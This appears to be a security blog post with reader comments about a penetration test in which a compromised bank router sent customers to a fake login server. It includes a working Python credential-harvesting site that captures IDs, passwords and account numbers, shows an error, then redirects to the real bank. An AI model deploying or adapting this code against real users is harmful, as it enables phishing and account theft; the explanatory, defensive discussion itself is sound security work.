After Two Security Assessments I Must Be Secure, Right?
Imagine you are the CIO of a national financial institution and you have recently deployed a state-of-the-art online transaction service for your customers. To make sure your company’s network perimeter is secure, you commissioned two external security assessments and penetration tests. When the final report came in, your company was given a clean bill of health. At first you felt relieved and confident in your security measures. Shortly thereafter, your relief turned to concern: “Is it really possible that we are completely secure?” Given your skepticism, you decide to get one more opinion. The day of the penetration test report delivery is now at hand. Based on the previous assessments, you expect to receive nothing but positive information…
The Results Were Less Than Pleasing
During this penetration test there were several interesting findings, but we are going to focus on one that would knock the wind out of anyone responsible for the security of online systems, particularly anyone in the business of money.
Most people are familiar with the term “phishing”. Dictionary.com defines phishing as “the practice of luring unsuspecting Internet users to a fake Web site by using authentic-looking email with the real organization’s logo, in an attempt to steal passwords, financial or personal information, or introduce a virus attack; the creation of a Web site replica for fooling unsuspecting Internet users into submitting personal or financial information or passwords”. Although spam / unsolicited e-mail and direct web server compromise are the most common methods of phishing, there are other ways to accomplish this fraudulent activity.
Internet Router Compromise Makes For a Bad Day
In this case, the Internet router was compromised using a well-known Cisco vulnerability. Once that was accomplished, the sky was the limit as far as what could be done to the organization. Even though the company’s web server was secure, and the firewall protecting it was configured adequately, what took place next made those defenses irrelevant: the attacker was sitting in front of them, on the device every customer’s traffic has to pass through.
Instead of setting up a duplicate login site on an external system and then sending out spam to entice customers into giving up their user ID, password and account numbers, a different and much more nefarious approach was taken.
Phishing for Personal or Financial Information
Remember that router that was compromised? As a proof of concept, the router configuration was altered to forward all Internet traffic bound for the legitimate web server to another web server, where user IDs, passwords and account information could be collected. The first time this information was entered, the customer received an ambiguous error. The second time the page loaded, the fake web server redirected the customer to the real site. When the user re-entered the requested information, everything worked just fine.
No one, not the customer nor the company, had any idea that something nefarious was going on. No bells or whistles went off, and no one questioned the error. Why would they? The customer could have mistyped the password, and a one-off error on a web page is something everyone deals with from time to time. From the company’s side, the legitimate server only ever saw the second, successful login; the first attempt never reached it.
At this point you can let your imagination take over. The attacker may not use the collected information right away; it could be days or weeks before it is used, by which time any trace of how it was collected would most likely be gone.
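To make the two-step behaviour above concrete, here is a small model of the fake login site, written for this page and not taken from the original write-up or the test described in it. It assumes plain HTTP and a cookie-based session; the article does not say what transport was in use or how the fake server told a first visit from a second. The hostname, cookie name and error text are placeholders. The request logic is a pure function so it can be exercised offline; the `http.server` wrapper at the bottom only runs when the file is executed directly and binds to localhost.

```python
"""Model of the credential-harvesting site described in the write-up.

Added example, not the original author's code. Assumptions: plain HTTP,
a session cookie to tell the first visit from the second, and
placeholder names for the bank's site. Nothing here touches a router.
"""
from __future__ import annotations

import secrets
import urllib.parse
from dataclasses import dataclass, field
from http.server import BaseHTTPRequestHandler, HTTPServer

# Hypothetical names: the page never gives the bank's real hostname.
REAL_SITE = "https://online.example-bank.test/login"
COOKIE = "sid"
ERROR_BODY = "We are unable to process your request at this time. Please try again."
LOGIN_FORM = (
    "<form method='post'>"
    "<input name='userid'><input name='password' type='password'>"
    "<input name='account'><button>Log in</button></form>"
)


@dataclass
class HarvestState:
    """Everything the fake site remembers between requests."""
    captured: list[dict] = field(default_factory=list)  # what the attacker walks away with
    burned: set[str] = field(default_factory=set)       # sessions that already saw the error


@dataclass
class Response:
    status: int
    headers: dict
    body: str


def handle(state: HarvestState, method: str, form: dict, cookies: dict) -> Response:
    """One request against the fake login page.

    First POST from a visitor: record the form, set a session cookie and
    answer with an ambiguous error, so the visitor simply retries.
    Any later request carrying that cookie: 302 to the real site, so the
    retry succeeds there and nothing looks wrong to the customer.
    """
    if cookies.get(COOKIE) in state.burned:
        # Second page load: hand the victim to the legitimate server.
        return Response(302, {"Location": REAL_SITE}, "")

    if method != "POST":
        # First visit: serve the cloned login form.
        return Response(200, {"Content-Type": "text/html"}, LOGIN_FORM)

    # First submission: keep the credentials, burn the session, show the error.
    sid = secrets.token_hex(8)
    state.captured.append({k: form.get(k, "") for k in ("userid", "password", "account")})
    state.burned.add(sid)
    return Response(
        200,
        {"Content-Type": "text/html", "Set-Cookie": f"{COOKIE}={sid}; Path=/"},
        ERROR_BODY,
    )


def parse_cookies(raw: str) -> dict:
    """Minimal Cookie header parser: 'a=1; b=2' -> {'a': '1', 'b': '2'}."""
    return dict(p.strip().split("=", 1) for p in raw.split(";") if "=" in p)


class _Handler(BaseHTTPRequestHandler):
    state = HarvestState()

    def _send(self, r: Response) -> None:
        self.send_response(r.status)
        for k, v in r.headers.items():
            self.send_header(k, v)
        self.end_headers()
        self.wfile.write(r.body.encode())

    def do_GET(self) -> None:
        self._send(handle(self.state, "GET", {}, parse_cookies(self.headers.get("Cookie", ""))))

    def do_POST(self) -> None:
        n = int(self.headers.get("Content-Length", 0))
        form = {k: v[0] for k, v in urllib.parse.parse_qs(self.rfile.read(n).decode()).items()}
        self._send(handle(self.state, "POST", form, parse_cookies(self.headers.get("Cookie", ""))))


if __name__ == "__main__":
    # Local demonstration only: visit http://127.0.0.1:8080/ twice with a browser.
    HTTPServer(("127.0.0.1", 8080), _Handler).serve_forever()
```

Two things stand out once the flow is written down. The real server never sees the first submission, so its logs contain nothing but a successful login; the only evidence lives on the fake host and in the router configuration. And the whole trick rests on the customer having no way to tell the two servers apart, which is why the route change, and not the web server or the firewall, is the control that failed.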
What Do You Really Get Out Of Security Assessments
I can’t tell you how many times I’ve been presented with security assessment reports that are little more than the output of an off-the-shelf or open source automated security scanner. Although an attacker may use the same or similar tools during an attack, they do not rely solely on that output to reach their goal. An effective penetration test or security assessment must be performed by someone who understands not only what the vulnerabilities are and how to run off-the-shelf tools, but how an attacker would actually use them against the organization. The person executing the assessment must be armed with tools and experience that meet or exceed those of a potential attacker.
Conclusion
Whether you are a small, medium or large company, you must be very careful about who you decide is most qualified to review your company’s security defenses, or security profile. Just because an organization presents you with credentials, such as consultants with their CISSP…, it does not mean these people have any real-world experience. All the certifications in the world cannot assure you that the results of a security assessment are thorough and complete. Getting a second opinion is appropriate given what may be at stake. If you were not feeling well and knew that something was wrong with you, would you settle for just one doctor’s opinion?
Quite frankly, I’ve never met a hacker (I know I will get slammed for using this term; I always do) who has a certification stating that they know what they are doing. They know what they are doing because they’ve done it, over and over again, and have a complete understanding of network systems and software. On top of that, the one thing they have that no class or certification can teach is imagination.
What the author described is an illegal intercept (basically, a wiretap), rather than phishing, which occurs out of band to the enterprise. It’s a bad idea to try to conflate these terms.
Security engineers and “experts” think they understand networking. In reality, most security experts understand host security quite well. They falter when they must deal with true network security issues, such as securing network infrastructure. They usually just ignore routers and switches - a big mistake.
Use of the Secure IOS template at cymru.com will solve many of the common enterprise router security issues.
Daniel,
You are right on the mark with your assessment. Although this is not phishing in the “traditional” sense, it is a means to an end. It was not my intention to conflate the terms, only to show there are other methods of achieving the same objective (in this case, phishing).
You are also correct in your assessment of the majority of security engineers. Many of the most basic, non-host based issues are overlooked. This is why I tend to become engaged as a second or third opinion. I have an extensive background in networking and many OS platforms. Most of the security flaws / configuration issues I find are initially overlooked because of lack of experience with a broad range of technology and the inability to look at networks and networked systems with a broad scope.
DWM
The real question here is - are these network vulnerabilities a greater threat than someone posing as a telephone company employee and installing a wiretap? Could the bank avoid the problem by using an ISP that is more conscientious about the security of their routers and DNS servers, or do these problems affect all ISPs?
David,
It is certainly the case that some ISPs are better than others in network security areas; it would be surprising if it were otherwise.
I did a DNS review for a large merchant bank, and as part of that I reviewed (without intrusive scanning) the security of the DNS servers providing domain services for a selection of about 30 domains owned by the bank in a diverse set of countries (and the security of the parent domains, right back to the root DNS servers).
There were huge differences, providers failing to provide suitable redundancy, providers running servers with known vulnerabilities, domains with inappropriate dependencies on a wide range of servers, versus providers who provided both suitable redundancy, and up to date software.
In this instance the review was tightly focused on the domain name service, because that is what the client was interested in improving, but I’m confident similar surveys in other areas would produce similar results.
The company that hired me to do the analysis was one such supplier, and one of those who “did it right”, but I guess that is why they were chosen to manage the review process.
However, attempts to “sell” this knowledge to banks (and others) for my own business benefit were less successful, but that may be because I’m a techy and not a salesman.